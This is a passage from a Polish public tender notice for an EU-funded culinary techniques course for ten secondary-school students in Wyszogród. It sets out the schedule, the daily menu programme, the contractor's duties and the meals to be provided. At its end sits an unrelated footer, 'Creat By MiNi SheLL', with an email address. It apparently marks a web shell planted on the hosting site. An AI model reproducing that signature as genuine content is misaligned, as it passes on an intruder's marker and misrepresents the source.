- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń/certyfikatów o ukończeniu szkolenia, 
  - zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych    z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeprowadzenie Kursu Techniki Kulinarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 grupa szkoleniowa 10 osobowa  uczniów Zespołu Szkół im. Jana Śniadeckiego w Wyszogrodzie

1.Miejsce realizacji: Zespół Szkół im. Jana Śniadeckiego w Wyszogrodzie, ul. Niepodległości 11,
2.Termin realizacji: styczeń - luty 2015r.
3.Szczegółowy harmonogram:
-20 godzin,
-4 spotkania po 5 godzin (1 godzina = 45 min),
-realizacja w dni wolne od zajęć dydaktycznych obowiązkowych (godziny pomiędzy 8.00 a 18.00),
-Wykonawca zapewni w każdym dniu prowadzenia zajęć przerwy w tym jedną przerwę obiadową trwającą 30 minut.
4.Program szkolenia:
Dzień 1 
1.Przepisy bhp i przeciw pożarowe obowiązujące podczas pracy w kuchni hotelowej
2.Wstęp teoretyczny - śniadania międzynarodowe 
3.Przygotowywanie typowych potraw śniadaniowych:
a)Śniadanie typu angielskiego,
b)Śniadanie typu francuskiego,
c)Śniadanie typu holenderskiego,
d)Śniadanie wiedeńskie
e)Śniadanie polskie - wielkanocne
Dzień 2 
1.Wstęp teoretyczny - zasady przygotowywania i dekorowania potraw na przyjęcia bankietowe i imprezy cateringowe 
2.Przygotowywanie i dekorowanie zakąsek zimnych i gorących:
a)Mini zakąski: zakąski zimne, kanapki,
b)Cocktaile,
c)Sałatki,
d)Zakąski z wędlin,
e)Zakąski gorące.
Dzień 3)
1.Wstęp teoretyczny - podział deserów oraz metod ich przyrządzania 
2.Przygotowywanie i dekorowanie deserów:
a)Desery z owoców,
b)Kremy i galaretki,
c)Desery lodowe,
d)Desery z ciast.
Dzień 4 )
1.Wstęp teoretyczny - znane zupy świata - podział, sposób serwowania i dodatki
2.Przygotowanie zup wraz z odpowiednimi dodatkami: 
a)Zupa cebulowa zapieczona z  grzankami i serem podpuszczkowym (zupa francuska)
b)Zupa Minestrone z ręcznie robionymi kluskami (włoska zupa jarzynowa)
c)Zupa Gazpacho z grzankami (hiszpański chłodnik)
d)   Gulasz (tradycyjna zupa węgierska)
e)Najpopularniejsze zupy polskie (np. wybór 2 z pośród: barszcz czerwony, rosół, pomidorowa, ogórkowa) oraz dodatki.
5.Wymagania wobec Wykonawcy:
-Zapewnienie uczestnikom na czas realizacji kursu niezbędnych materiałów szkoleniowych, sprzętu oraz wszelkich produktów potrzebnych do realizacji kursu zgodnie ze wskazanym programem w części teoretycznej i praktycznej w ilości zapewniającej wszystkim uczestnikom kursu wykonanie ćwiczeń w pełnym zakresie zgodnie z realizowanym programem.
-Zapewnienie uczestnikom kursu materiałów dydaktycznych zawierających przepisy kulinarne wykonanych na kursie potraw oraz innych informacji niezbędnych do utrwalenia wiadomości - mogą to być np. kserokopie streszczeń wykładów, skrypty oraz długopis i notatnik. Wszystkie te materiały muszą być przygotowane i rozdane uczestnikom szkolenia najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów dydaktycznych własnoręcznym podpisem. Oryginał tego pokwitowania Zamawiający otrzyma od Wykonawcy po zakończeniu kursu razem z innymi materiałami niezbędnymi do rozliczenia całej usługi.
-Wykonawcy jest zobowiązany do zakupu dziennika zajęć.
- Wykonawca jest zobowiązany do: umieszczenia logo Programu operacyjnego Kapitał Ludzki i logo Unii Europejskiej na wszystkich dokumentach dotyczących realizacji danego szkolenia oraz materiałach szkoleniowych, edukacyjnych, plakatach, broszurach i  zaświadczeniach, certyfikatach.
-Informowanie uczestników o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
- przestrzeganie przepisów o ochronie danych osobowych, zgodnie z ustawą   z dnia 29 sierpnia 1997r. o ochronie danych osobowych,
- Zapewnienie warunków przeprowadzenia zajęć zgodnie z przepisami bezpieczeństwa  i higieny pracy,
- Prowadzenie zajęć zgodnie z przedstawionym przez Wykonawcę harmonogramem zajęć, zaakceptowanym przez Zamawiającego,
-prowadzenie dokumentacji przebiegu zajęć pozalekcyjnych na podstawie:
- wpisów w dzienniku zajęć; tematy zajęć edukacyjnych i wymiar godzin,
- listy obecności uczniów z każdego dnia zajęć,
- wypełnione karty pracy przez wykonawców zajęć pozalekcyjnych.
- wydanie uczniom zaświadczeń o ukończeniu kursu,
 - zapewnienie opieki pedagogicznej uczniom podczas trwania zajęć edukacyjnych.
6.Zamawiający zabezpiecza: salę dydaktyczną i salę do ćwiczeń praktycznych     z możliwością wykorzystania sprzętu multimedialnego.
7.Wykonawca jest zobowiązany do zapewnienia wyżywienia uczestników kursu - w każdym dniu prowadzenia zajęć zapewni każdemu uczestnikowi 1 ciepły posiłek - drugie danie (np. danie mięsne, ziemniaki i surówka) oraz  ciastko,  owoc i napój..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com